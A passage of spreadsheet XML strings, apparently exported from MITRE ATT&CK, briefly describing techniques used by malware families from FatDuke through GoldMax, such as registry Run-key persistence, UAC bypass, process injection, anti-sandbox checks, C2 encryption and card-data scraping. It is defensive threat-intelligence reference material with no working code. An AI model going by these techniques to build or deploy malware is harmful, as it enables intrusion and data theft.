    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to create a process.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can call &lt;code&gt;ShellExecuteW&lt;/code&gt; to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from &lt;code&gt;HKCU\Software\Classes\http\shell\open\command&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used &lt;code&gt;HKLM\SOFTWARE\Microsoft\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) can download files from remote servers.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) has masqueraded as legitimate Adobe Content Management System files.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) checks for processes associated with anti-virus vendors.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom method for C2 traffic that utilizes Base64.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the system information, including hostname and OS version, and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the victim LAN IP address and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the current username and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses command line for execution.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) can dump Windows password hashes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) contains junk code in its functions in an effort to confuse disassembly programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>Some [FinFisher](https://attack.mitre.org/software/S0182) variants incorporate an MBR rootkit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) performs UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) clears the system event logs using &lt;code&gt; OpenEventLog/ClearEventLog APIs &lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) hooks processes by modifying IAT pointers to CreateWindowEx.(Citation: FinFisher Citation)(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses DLL search order hijacking.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses DLL side-loading to load malicious programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) extracts and decrypts stage 3 malware, which is stored in encrypted resources.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) injects itself into various processes depending on whether it is low integrity or high integrity.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) enumerates directories and scans for certain files.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) establishes persistence by creating the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\Run&lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) probes the system to check for antimalware processes.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses a custom packer.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks if the victim OS is 32 or 64-bit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses token manipulation with NtFilterToken as part of UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) creates a new Windows service with the malicious executable for persistence.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses Python code to deobfuscate base64-encoded strings.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obfuscates strings with base64 encoding.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains a list of running processes.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) creates a Registry Run key to establish persistence.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains victim Microsoft Windows version information and CPU architecture.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can record audio using any existing hardware recording devices.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use Windows Authentication Packages for persistence.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.(Citation: Symantec Beetlejuice)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>Rundll32.exe is used as a way of executing [Flame](https://attack.mitre.org/software/S0143) at the command-line.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can take regular screenshots when certain applications are open that are sent to the command and control server.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) identifies security software such as antivirus through the Security module.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) may obfuscate portions of the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the privilege level of the victim during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect if a usable smart card is current inserted into a card reader.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect anti-virus products during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used SEAL encryption during the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) beacons out the victim operating system and computer name during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the current user during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) leverages WMI to enumerate anti-virus on the victim.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) encrypts its C2 configuration files with AES in CBC mode.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to subvert controls and possibly conceal command execution by not directly invoking [cmd](https://attack.mitre.org/software/S0106).(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) will delete files on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) looks for specific files and file types.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) saves itself with a leading "." to make it a hidden file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) executes and stores obfuscated Perl scripts.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) has the ability to list processes on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) takes screenshots of the user's desktop.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to delete files.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has the ability to search for files.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can perform keylogging.(Citation: Fysbis Palo Alto Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as the rsyncd and dbus-inotifier services.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as trusted software rsyncd and dbus-inotifier.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has been encrypted using XOR and RC4.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can collect information about running processes.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) can use Base64 to encode its C2 traffic.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has used the command &lt;code&gt;ls /etc | egrep -e"fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"&lt;/code&gt; to determine which Linux OS version is running.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has established persistence using a systemd service.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has installed itself as an autostart entry under &lt;code&gt;~/.config/autostart/dbus-inotifier.desktop&lt;/code&gt; to establish persistence.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) communicates to servers operated by Google using the Jabber/XMPP protocol.(Citation: Mandiant APT1)(Citation: CyberESI GTALK)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve Windows domain membership information.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used PowerShell to execute the Meterpreter downloader TinyMet.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a persistence module that stores the implant inside the Registry, which executes at logon.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used &lt;code&gt;sctasks&lt;/code&gt; for persistence. (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a screenshot module that can be used to take a screenshot of the remote system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve the date and time of the system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses RSA.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) versions are signed with various valid certificates; one was likely faked and issued by Comodo for "Solid Loop Ltd," and another was issued for "Ultimate Computer Support Ltd."(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) has commands to delete files and persistence mechanisms from the victim.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can execute a task to download a file.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) injects its communication module into an Internet accessible process through which it performs C2.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a scheduled task.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence through the system screensaver by configuring it to execute the malware.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses 3DES.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) obtains the current user's security identifier.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>For early [Gazer](https://attack.mitre.org/software/S0168) versions, the compilation timestamp was faked.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on local user accounts from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on running processes and environment variables from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on network settings and Internet proxy settings from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on programs and services on the victim that are configured to automatically run at startup.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) encrypts data using Base64 before being sent to the command and control server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) terminates anti-malware processes if they’re found running on the system.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) deletes one of its files, 2.hwp, from the endpoint after establishing persistence.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) lists the directories for Desktop, program files, and the user’s recently accessed files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) can download additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) stores information gathered from the endpoint in a file named 1.hwp.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks the running processes on the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) enumerates registry keys with the command &lt;code&gt;regkeyenum&lt;/code&gt; and obtains information for the Registry key &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) establishes persistence in the Startup folder.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks for anti-malware products and processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects endpoint information using the &lt;code&gt;systeminfo&lt;/code&gt; command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses cmd.exe to execute commands for discovery.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldFinder](https://attack.mitre.org/software/S0597) logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.(Citation: MSTIC NOBELIUM Mar 2021)  </t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has RSA-encrypted its communication with the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
